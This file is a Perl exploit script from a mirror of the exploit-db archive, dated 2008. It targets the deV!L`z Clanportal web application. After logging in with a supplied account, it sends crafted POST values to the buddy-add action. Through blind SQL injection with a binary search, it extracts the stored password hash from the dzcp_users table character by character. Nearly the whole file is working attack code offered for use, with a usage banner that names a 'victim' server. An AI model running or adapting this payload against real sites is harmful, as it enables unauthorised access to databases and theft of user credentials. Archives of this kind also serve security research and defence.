bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/6961.pl
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

127 lines
No EOL
3.7 KiB
Perl
Executable file
Raw Blame History

use HTTP::Cookies;
use LWP::UserAgent;
my $ua = LWP::UserAgent->new( cookie_jar => HTTP::Cookies->new,);
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
usage();
print "\n";
$server = $ARGV[0];
$dir = $ARGV[1];
$username = $ARGV[2];
$password = $ARGV[3];
if (!$password) { die "Argh! Read teh Usage!\n"; }
$url0 = "http://".$server.$dir."user/index.php";
$url1 = $url0."?action=login&do=yes";
$url2 = $url0."?action=buddys&do=addbuddy";
syswrite(STDOUT, "[x]Connecting...", 16);
$response = $ua->get($url0);
if($response->is_success) {syswrite(STDOUT, "OK", 2);} else { print "\n[x]Ey I couldn't connect to ".$url0; exit;}
print "\n";
$captcha = ($response->content =~ m/secure=login/i) ? 1 : 0;
if($captcha) { captcha(); }
$response = (!$captcha) ? $ua->post($url1, [ "user" => $username, "pwd" => $password ]) : $ua->post($url1, [ "user" => $username, "pwd" => $password , "secure" => $imgCode]);
if($response->content =~ m/Sicherheitsscode/i) { print "[x]Lol you gave me wrong image code. Restart!"; exit; }
elsif($response->content =~ m/gesperrt/i) { print "[x]Omg you gave me wrong user details. Restart!"; exit; }
$response = $ua->get($url2);
print "[x]Kay, unleashing BlackMagic now. Getta Coffee and wait!!\n";
my @Daten;
array();
my $operator;
syswrite(STDOUT, "[x]Password: ", 13);
for($b=1;$b<=32;$b++) { inject(0,16); }
print "\n[x]OmFg I made it!!\n";
print "[x]Have FUN!\n";
print "[x]Greetz & Shoutz go to: IP-Sh0k, haZl0oh, bizzit, NoNePub, thund3r ,ramon,\n";
print " J0hn.X3r, electron1x, Paloxus, -tmh- aka B-Baerchi, Nazrek aka Patrick_B, WooMic, codeblu815\n";
print " Free-Hack, Sys-Flaw, SoH and h4ck-y0u!\n";
print "[x]Biggest Thanks go to Shadowleet aka \$h4d0wl33t who is simply the best at his stuff!";
sub hex_to_ascii($)
{
(my $str = shift) =~ s/([a-fA-F0-9]{2})/chr(hex $1)/eg;
return $str;
}
sub inject
{
$beg = $_[0]; $end = $_[1];
$mid = int(($beg + $end)/2); #print $mid."\n";
if(&equals($mid))
{
syswrite(STDOUT, hex_to_ascii($Daten[$mid]), 1);
return;
}
elsif(&bigger($mid)) { return inject($mid + 1, $end); }
else { return inject($beg, $mid - 1); }
}
sub equals { $ack = $_[0]; if( &request("=", $ack) !~ m/1242/i) { return 1; } }
sub bigger { $ack = $_[0]; if(&request(">", $ack) !~ m/1242/i) { return 1; } }
sub request
{
$operator = $_[0]; $bick = $_[1]; #probably only users without dzcp_
$response = $ua->post($url2, [ "users" => "999 and if(substring((select pwd from dzcp_users limit 0,1),".$b.",1)".$operator."0x".$Daten[$bick].",null,(select 1 union select 2))" ]);
#print $response->content;
return $response->content;
}
sub usage()
{
print q
{
------------------NON PUBLIC EXPLOIT-----------------
#####################################################
deV!L`z Clanportal BlackMagic EXPLOIT
-Exploit coded by h0yt3r-
Usage: devilz.pl [Server] [Path] [Username] [Password]
Sample:
perl devilz.pl www.victim.com /devilz/ h0yt3r 1337
Exploit requires Username and Password, as the vul-
nerable file is only visible for registered users!
#####################################################
};
}
sub captcha
{
print "[x]Captcha required!\n";
$captchaURL = "http://".$server.$dir."/antispam.php?secure=login";
my $captchaReq= $ua->get($captchaURL);
open(IMG,">captcha.jpg");
binmode IMG;
print IMG $captchaReq->content;
close IMG;
system('start captcha.jpg');
print "[x]Image Code: ";
$imgCode = <STDIN>;
chop($imgCode);
}
sub array
{
for($b=30;$b<=39; $b++) { push(@Daten,$b); }
for($b=61;$b<=66; $b++) { push(@Daten,$b); }
}
# milw0rm.com [2008-11-02]
Reference in a new issue View git blame Copy permalink